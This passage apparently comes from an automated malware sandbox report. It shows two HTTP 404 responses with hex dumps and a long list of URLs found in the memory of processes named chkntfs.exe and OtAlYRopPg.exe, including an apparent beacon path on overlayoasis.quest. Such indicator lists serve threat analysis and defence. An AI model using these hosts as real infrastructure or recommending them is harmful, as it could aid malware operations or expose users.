                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 08:13:28 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 08:13:31 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.legalstrategy.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.legalvideos.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.lesezhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.lianaizhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.liangmeizhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.liguizhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.linguarama.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.lingyangzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.liufangzhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.liuhuazhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.losbravos.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.lovemarketing.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.lovevintage.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.luolizhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.luxbrand.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.maituzhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.manchengzhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.manchengzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.maskmakers.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.masterfloors.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mediaccess.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.medicalink.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.megaos.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.meijiuzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.methlab.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.miaozhaozhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.moyouzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mynewshub.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.naikuaizhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.nuoyunzhibo.com
                Source: OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oshwal.net
                Source: OtAlYRopPg.exe, 00000007.00000002.4625453218.00000000052AB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.overlayoasis.quest
                Source: OtAlYRopPg.exe, 00000007.00000002.4625453218.00000000052AB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.overlayoasis.quest/ufm5/
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.pasiones.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.perfectpint.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.qilinzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.qimiaozhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.qinglizhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.qiyuezhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.rsbi.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.s8zhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.startuptalent.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.stayplus.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.taffix.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.tangyizhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theflowerpot.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.urbanscout.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.uwrf.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.welovebeauty.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wujizhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wunvzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wuyezhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wuyezhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiaodouzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiaomiaozhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiapizhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xingmengzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xingyuanzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xunaizhibo.com/binding
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yanyangzhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yanyuzhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yaomeizhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yemizhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yeyanzhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yinxiuzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.younazhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yourreality.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yuehaizhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yueliangzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yuemanzhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yueyanzhibo.net
